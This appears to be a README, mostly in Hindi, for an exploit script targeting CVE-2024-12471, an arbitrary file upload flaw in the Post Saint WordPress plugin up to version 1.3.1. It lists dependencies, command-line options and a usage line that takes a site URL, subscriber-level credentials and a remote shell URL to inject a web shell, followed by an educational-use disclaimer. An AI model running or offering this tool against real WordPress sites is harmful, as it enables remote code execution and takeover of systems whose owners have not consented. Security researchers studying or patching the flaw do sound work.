
WordPress के लिए Post Saint <= 1.3.1 प्लगइन मनमाना फ़ाइल अपलोड
Post Saint <= 1.3.1 प्लगइन वर्डप्रेस के लिए मनमाना फ़ाइल अपलोड
वर्डप्रेस के लिए Post Saint प्लगइन (संस्करण 1.3.1 तक, इसे शामिल करते हुए) क्षमता जाँच और फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है। कम से कम सब्सक्राइबर-स्तर की पहुँच वाले प्रमाणित हमलावर इस भेद्यता का फायदा उठाकर मनमानी फ़ाइलें अपलोड कर सकते हैं, जिससे संभावित रूप से रिमोट कोड निष्पादन हो सकता है।
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
यह स्क्रिप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।